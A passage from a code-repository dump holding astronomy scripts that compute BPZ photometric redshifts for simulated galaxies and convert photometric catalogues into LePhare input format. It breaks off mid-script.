GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f\n" }, { "alpha_fraction": 0.5101032257080078, "alphanum_fraction": 0.5840965509414673, "avg_line_length": 45.78911590576172, "blob_id": "20e161f587b6f86c55b539a44bebc9a7dd8e9ea9", "content_id": "18ddb4901fe3ca13bec67b3705f5f93a0b7cad0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "no_license", "max_line_length": 246, "num_lines": 147, "path": "/python/catalogue_utilities/photozMillenium_WFI2033.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code calculates realistic BPZ photoz for galaxies in the Millenium Simulation, based either on ugriz or ugrizJHK fluxes. It then creates the necessary files to run LePhare on SLAC. The code expects input files created by extractMillenium.py\n# run as: python photozMillenium_WFI2033.py /Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nroot_bpz = \"/Users/perseus/bpz-1.99.3/test/\"\nroot_original = \"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/txt/\"\nfile = str(sys.argv[1])\nos.system(\"cp %s %s\" % (file,file.replace(root_original, root_bpz)))\nif \"ugrizJHK\" in file:\n os.system(\"cp %smillennium_ugrizJHK.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\nelse:\n os.system(\"cp %smillennium_ugriz.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\n\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % file.replace(root_original, root_bpz))\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % file.replace(root_original, root_bpz)[:-4])\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nJ = 11\nJ_err = 12\nH = 13\nH_err = 14\nK = 15\nK_err = 16\n\nif \"ugrizJHK\" in file:\n data = np.loadtxt(file,usecols=[0,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],unpack=True)\n data_bpz = np.loadtxt(file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\",usecols=[9,1],unpack=True)\n ''' Write the mags into LePhare-expected format, and assuming no observations for mags below detection threshold '''\n u_corr = 0.015\n g_corr = 0.026\n r_corr = 0.029\n i_corr = 0.016\n z_corr = 0.018\n J_corr = -0.003\n H_corr = -0.005\n K_corr = -0.005\n #u_corr = 0.036\n #g_corr = 0.012\n #r_corr = 0.013\n #i_corr = -0.000\n #z_corr = -0.009\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[u_err][np.abs(data[u]) == 99.0] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n data[z_err][np.abs(data[z]) == 99.0] = -99.0\n data[J_err][np.abs(data[J]) == 99.0] = -99.0\n data[H_err][np.abs(data[H]) == 99.0] = -99.0\n data[K_err][np.abs(data[K]) == 99.0] = -99.0\n data[u][np.abs(data[u]) == 99.0] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n data[z][np.abs(data[z]) == 99.0] = -99.0\n data[J][np.abs(data[J]) == 99.0] = -99.0\n data[H][np.abs(data[H]) == 99.0] = -99.0\n data[K][np.abs(data[K]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n data[J][np.abs(data[J]) != 99.0] += J_corr\n data[H][np.abs(data[H]) != 99.0] += H_corr\n data[K][np.abs(data[K]) != 99.0] += K_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n data[J_err][data[J_err] == 0.00] = 0.01\n data[H_err][data[H_err] == 0.00] = 0.01\n data[K_err][data[K_err] == 0.00] = 0.01\n fileout = file[:-4] + \"_forlephare.txt\"\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t specz \\t photoz\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data_bpz[0],data_bpz[1]]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.2f')\nelse:\n data = np.loadtxt(file,usecols=[0,7,8,9,10,11,12,13,14,15,16],unpack=True)\n data_bpz = np.loadtxt(file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\",usecols=[1],unpack=True)\n u_corr = 0.036\n g_corr = 0.012\n r_corr = 0.013\n i_corr = -0.000\n z_corr = -0.009\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[u_err][np.abs(data[u]) == 99.0] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n data[z_err][np.abs(data[z]) == 99.0] = -99.0\n data[u][np.abs(data[u]) == 99.0] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n data[z][np.abs(data[z]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n fileout = file[:-4] + \"_forlephare.txt\"\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t photoz\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data_bpz]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".bpz\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".bpz.bak\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".flux_comparison\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".probs\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)))\nif \"ugrizJHK\" in file:\n os.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+'.columns'))\nelse:\n os.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+'.columns'))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.5305668115615845, "alphanum_fraction": 0.6059731245040894, "avg_line_length": 49.29460525512695, "blob_id": "cfdedee8827164aa06a00f31276b1b31aa21f5f8", "content_id": "088cd8e48bfcd806a9b1bd5ad3f7c847163dbb82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12121, "license_type": "no_license", "max_line_length": 433, "num_lines": 241, "path": "/python/catalogue_utilities/converttolephare_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) from BPZ-expected input into LePhare-expected input. The first part of the code accounts for non-detections but not for non-observations. The second part considers all non-detections as non-observations. This is because some non-detections would not execute.The code requires \"_withbpzeazy\" files, which include available spectroscopic information.\n##########################\n\nimport numpy as np \n\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmags.cat\"\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\"\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmags.cat\"\n\n# zeropoint corrections suggested by lephare:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nK_corr += 1.83\n\nid = 8\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nK = 25\nK_err = 26\nphotoz_bpz = 28\nphotoz_eazy = 48\nspecz = 40\n\n#irac1 = 0\n#irac1_err = 1\n#irac2 = 2\n#irac2_err = 3\n#irac3 = 4\n#irac3_err = 5\n#irac4 = 6\n#irac4_err = 7\nirac1 = 74\nirac1_err = 75\nirac2 = 76\nirac2_err = 77\nirac3 = 78\nirac3_err = 79\nirac4 = 80\nirac4_err = 81\n\ndata = np.loadtxt(file,unpack=True)\n\n# If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n#data[irac1] = -99\n#data[irac1_err] = -99\n#data[irac2] = -99\n#data[irac2_err] = -99\n#data[irac3] = -99\n#data[irac3_err] = -99\n#data[irac4] = -99\n#data[irac4_err] = -99\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# use photoz where specz is unavailable, or for stars\ndata[photoz_bpz][data[specz] > 0] = data[specz][data[specz] > 0]\ndata[photoz_eazy][data[specz] > 0] = data[specz][data[specz] > 0]\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# correct the limiting mags\ndata[u_err][np.abs(data[u]) == 99.0] += u_corr\ndata[g_err][np.abs(data[g]) == 99.0] += g_corr\ndata[r_err][np.abs(data[r]) == 99.0] += r_corr\ndata[i_err][np.abs(data[i]) == 99.0] += i_corr\ndata[z_err][np.abs(data[z]) == 99.0] += z_corr\ndata[Y_err][np.abs(data[Y]) == 99.0] += Y_corr\ndata[J_err][np.abs(data[J]) == 99.0] += J_corr\ndata[H_err][np.abs(data[H]) == 99.0] += H_corr\ndata[K_err][np.abs(data[K]) == 99.0] += K_corr\n\n# the format for nondetections is error=-1.0 and magnitude at 1-sigma\ndata[u][np.abs(data[u]) == 99.0] = data[u_err][np.abs(data[u]) == 99.0]\ndata[g][np.abs(data[g]) == 99.0] = data[g_err][np.abs(data[g]) == 99.0]\ndata[r][np.abs(data[r]) == 99.0] = data[r_err][np.abs(data[r]) == 99.0]\ndata[i][np.abs(data[i]) == 99.0] = data[i_err][np.abs(data[i]) == 99.0]\ndata[z][np.abs(data[z]) == 99.0] = data[z_err][np.abs(data[z]) == 99.0]\ndata[Y][np.abs(data[Y]) == 99.0] = data[Y_err][np.abs(data[Y]) == 99.0]\ndata[J][np.abs(data[J]) == 99.0] = data[J_err][np.abs(data[J]) == 99.0]\ndata[H][np.abs(data[H]) == 99.0] = data[H_err][np.abs(data[H]) == 99.0]\ndata[K][np.abs(data[K]) == 99.0] = data[K_err][np.abs(data[K]) == 99.0]\ndata[u_err][np.abs(data[u_err]) > 20] = -1.0\ndata[g_err][np.abs(data[g_err]) > 20] = -1.0\ndata[r_err][np.abs(data[r_err]) > 20] = -1.0\ndata[i_err][np.abs(data[i_err]) > 20] = -1.0\ndata[z_err][np.abs(data[z_err]) > 20] = -1.0\ndata[Y_err][np.abs(data[Y_err]) > 20] = -1.0\ndata[J_err][np.abs(data[J_err]) > 20] = -1.0\ndata[H_err][np.abs(data[H_err]) > 20] = -1.0\ndata[K_err][np.abs(data[K_err]) > 20] = -1.0\n\n# LePhare thinks error bars = 0 means non-detection, so fix this\ndata[u_err][data[u_err] == 0.00] = 0.01\ndata[g_err][data[g_err] == 0.00] = 0.01\ndata[r_err][data[r_err] == 0.00] = 0.01\ndata[i_err][data[i_err] == 0.00] = 0.01\ndata[z_err][data[z_err] == 0.00] = 0.01\ndata[Y_err][data[Y_err] == 0.00] = 0.01\ndata[J_err][data[J_err] == 0.00] = 0.01\ndata[H_err][data[H_err] == 0.00] = 0.01\ndata[K_err][data[K_err] == 0.00] = 0.01\n\n#fileout = file[:-16] + \"_forlepharewithbpz.cat\"\nfileout = file[:-4] + \"_forlepharewithbpzIRAC.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_bpz]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n#fileout = file[:-16] + \"_forlepharewitheazy.cat\"\nfileout = file[:-4] + \"_forlepharewitheazyIRAC.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) from BPZ-expected input into LePhare-expected input. It considers all non-detections as non-observations. This is because some non-detections would not execute.\n##########################\n\ndata = np.loadtxt(file,unpack=True)\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n#data[irac1] = -99\n#data[irac1_err] = -99\n#data[irac2] = -99\n#data[irac2_err] = -99\n#data[irac3] = -99\n#data[irac3_err] = -99\n#data[irac4] = -99\n#data[irac4_err] = -99\ndata[u_err][np.abs(data[u]) == 99.0] = -99.0\ndata[g_err][np.abs(data[g]) == 99.0] = -99.0\ndata[r_err][np.abs(data[r]) == 99.0] = -99.0\ndata[i_err][np.abs(data[i]) == 99.0] = -99.0\ndata[z_err][np.abs(data[z]) == 99.0] = -99.0\ndata[Y_err][np.abs(data[Y]) == 99.0] = -99.0\ndata[J_err][np.abs(data[J]) == 99.0] = -99.0\ndata[H_err][np.abs(data[H]) == 99.0] = -99.0\ndata[K_err][np.abs(data[K]) == 99.0] = -99.0\ndata[u][np.abs(data[u]) == 99.0] = -99.0\ndata[g][np.abs(data[g]) == 99.0] = -99.0\ndata[r][np.abs(data[r]) == 99.0] = -99.0\ndata[i][np.abs(data[i]) == 99.0] = -99.0\ndata[z][np.abs(data[z]) == 99.0] = -99.0\ndata[Y][np.abs(data[Y]) == 99.0] = -99.0\ndata[J][np.abs(data[J]) == 99.0] = -99.0\ndata[H][np.abs(data[H]) == 99.0] = -99.0\ndata[K][np.abs(data[K]) == 99.0] = -99.0\n\n# use photoz where specz is unavailable, or for stars\ndata[photoz_bpz][data[specz] > 0] = data[specz][data[specz] > 0]\ndata[photoz_eazy][data[specz] > 0] = data[specz][data[specz] > 0]\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# LePhare thinks error bars = 0 means non-detection, so fix this\ndata[u_err][data[u_err] == 0.00] = 0.01\ndata[g_err][data[g_err] == 0.00] = 0.01\ndata[r_err][data[r_err] == 0.00] = 0.01\ndata[i_err][data[i_err] == 0.00] = 0.01\ndata[z_err][data[z_err] == 0.00] = 0.01\ndata[Y_err][data[Y_err] == 0.00] = 0.01\ndata[J_err][data[J_err] == 0.00] = 0.01\ndata[H_err][data[H_err] == 0.00] = 0.01\ndata[K_err][data[K_err] == 0.00] = 0.01\n\n#fileout = file[:-16] + \"_forlepharewithbpz_noobs.cat\"\nfileout = file[:-4] + \"_forlepharewithbpzIRAC_noobs.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_bpz]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n#fileout = file[:-16] + \"_forlepharewitheazy_noobs.cat\"\nfileout = file[:-4] + \"_forlepharewitheazyIRAC_noobs.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n" }, { "alpha_fraction": 0.543608546257019, "alphanum_fraction": 0.610519289970398, "avg_line_length": 45.9375, "blob_id": "e13613930d1a2cfd6979bf1401f195d417311f45", "content_id": "88767eecf580e29730fefa170aa51825fbb2e2ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6008, "license_type": "no_license", "max_line_length": 283, "num_lines": 128, "path": "/python/catalogue_utilities/photozMillennium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code calculates realistic BPZ photoz for galaxies in the Millenium Simulation. It then creates the necessary files to run LePhare on SLAC. The code expects input files created by extractMillenium.py\n# run as: python photozMillennium.py GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206.images.txt\n# or python photozMillennium.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxi_griz.images.txt\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\n# grep -v 99.00 GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206.images.txt > GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206noupperlimits.images.txt # this is for the case when I am calibrating the zpt, so I should not use upper limits\nroot_bpz = \"/Users/cerusu/bpz-1.99.3/test/\"\nroot_original = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/0408_SA_gal_sampledphot/\"\n#root_original = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/0408_Henriques_gal_sampledphot/\"\nfile = str(sys.argv[1])\n\nif \"Henriques\" in root_original: # this is because when I created the files the first line was filled with zeros\n file1 = root_original+file\n file1_ = root_original+file+\"_\"\n os.system(\"sed \\'2d\\' %s > %s\" %(file1,file1_))\n os.system(\"mv %s %s\" %(file1_,file1))\n os.system(\"rm %s\" %file1_)\n\nfile1 = root_bpz+file[:-4]+'.cat'\nos.system(\"cp %s %s\" % (root_original+file,file1))\n#if \"griK\" in file: os.system(\"cp %smillennium_griK.columns %s\" % (root_bpz,file1[:-4]+'.columns'))\nif \"griz\" in file: os.system(\"cp %smillennium_griz.columns %s\" % (root_bpz,file1[:-4]+'.columns'))\n\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % file1)\n#os.system(\"python $BPZPATH/bpz.py %s -INTERP 2 -ONLY_TYPE yes\" % file1)\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % file1[:-4])\n\nid = 0\n#u = 1\n#u_err = 2\ng = 1\ng_err = 2\nr = 3\nr_err = 4\ni = 5\ni_err = 6\nz = 7\nz_err = 8\n#J = 11\n#J_err = 12\n#H = 13\n#H_err = 14\n#K = 7\n#K_err = 8\n\nif \"griK\" in file:\n data = np.loadtxt(root_original+file,usecols=[0,7,8,9,10,11,12,13,14],unpack=True) # ID + mags\n data_bpz = np.loadtxt(file1[:-4]+\"_bpz.cat\",usecols=[9,1],unpack=True)\n ''' Write the mags into LePhare-expected format, and assuming no observations for mags below detection threshold '''\n #u_corr = 0.0 # for griK these are the offsets suggested by running BPZ on one simulation field; scaled so that I apply the same i-band offset as for ugrizJHK\n g_corr = 0.010\n r_corr = 0.010\n i_corr = 0.016\n #z_corr = 0.0\n #J_corr = 0.0\n #H_corr = 0.0\n K_corr = -0.012\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n #data[u_err] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n #data[z_err] = -99.0\n #data[J_err] = -99.0\n #data[H_err] = -99.0\n data[K_err][np.abs(data[K]) == 99.0] = -99.0\n #data[u] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n #data[z] = -99.0\n #data[J] = -99.0\n #data[H] = -99.0\n data[K][np.abs(data[K]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n #data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n #data[z][np.abs(data[z]) != 99.0] += z_corr\n #data[J][np.abs(data[J]) != 99.0] += J_corr\n #data[H][np.abs(data[H]) != 99.0] += H_corr\n data[K][np.abs(data[K]) != 99.0] += K_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n #data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n 